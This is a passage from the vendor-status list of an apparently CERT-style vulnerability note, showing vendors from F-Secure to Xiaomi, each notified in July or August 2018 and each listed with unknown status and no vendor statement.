
Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### F-Secure Corporation Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### F5 Networks, Inc. Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Fastly Unknown

Notified: August 29, 2018 Updated: August 29, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Fedora Project Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Force10 Networks Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Fortinet, Inc. Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Foundry Brocade Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### FreeBSD Project Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### GFI Software, Inc. Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### GNU adns Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### GNU glibc Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Geexbox Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this
vulnerability.

### Gentoo Linux Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Google Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### HP Inc. Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### HTC Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### HardenedBSD Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Hewlett Packard Enterprise Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Hitachi Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding
this vulnerability.

### HomeSeer Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Honeywell Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Huawei Technologies Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### IBM Corporation (zseries) Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### IBM Global Services Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### IBM eServer Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### IBM, INC. Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### INTEROP Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Illumos Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### InfoExpress, Inc. Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Infoblox Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Inmarsat Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Intel Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Internet Systems Consortium Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Internet Systems Consortium - DHCP Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Interniche Technologies, inc. Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### JH Software Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Joyent Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Kyocera Communications Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### LANCOM Systems GmbH Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of
further vendor information regarding this vulnerability.

### LG Electronics Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Lancope Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Lantronix Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Lenovo Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Linksys Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Lynx Software Technologies Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Marvell Semiconductors Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### McAfee Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### MediaTek Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Medtronic Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Men & Mice Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### MetaSwitch Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Micro Focus Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Microchip Technology Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Microsoft Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Microsoft Vulnerability Research Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Miredo Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Mitel Networks, Inc. Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### MontaVista Software, Inc. Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Motorola, Inc. Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Muonics, Inc. Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### NAS4Free Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### NEC Corporation Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### NETSCOUT Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### NIKSUN Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### NetBSD Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### NetBurner Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Netgear, Inc. Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Nexenta Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Nixu Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Nokia Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### Nominum Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### OmniTI Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### OpenBSD Unknown

Notified: July 18, 2018 Updated: July 18, 2018

### Status

Unknown

### Vendor Statement

We have not received a statement from the vendor.

### Vendor Information

We are not aware of further vendor information regarding this vulnerability.

### OpenConnect Unknown

Notified:
July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### OpenDNS Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### OpenIndiana Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Oracle Corporation Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Oryx Embedded Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### PHPIDS Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Paessler 
Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Pantech North America Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Peplink Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Philips Electronics Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### PowerDNS Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Proxim, Inc. 
Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Pulse Secure Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### QLogic Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### QNX Software Systems Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### QUALCOMM Incorporated Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Quadros Systems Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Quagga Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this 
vulnerability.\n\n### Quantenna Communications Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Red Hat, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ReefEdge, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Riverbed Technologies Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Rocket RTOS Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Roku Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ruckus Wireless Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further 
vendor information regarding this vulnerability.\n\n### SMC Networks, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SUSE Linux Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SafeNet Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Samsung Mobile Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Samsung Semiconductor Inc. 
Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Secure64 Software Corporation Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Sierra Wireless Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Slackware Linux Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Snort Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SonicWall Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Sonos Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this 
vulnerability.\n\n### Sony Corporation Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Sophos, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Sourcefire Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Sybase Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Symantec Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### TCPWave Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### TP-LINK Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this 
vulnerability.\n\n### Technicolor Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### The Open Group Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### The SCO Group (SCO Unix) Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Tizen Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Toshiba Commerce Solutions Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### TrueOS Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Turbolinux Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further 
vendor information regarding this vulnerability.\n\n### Ubuntu Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Unisys Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### VMware Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vertical Networks, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Wind River Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### WizNET Technology Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Xiaomi Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of 
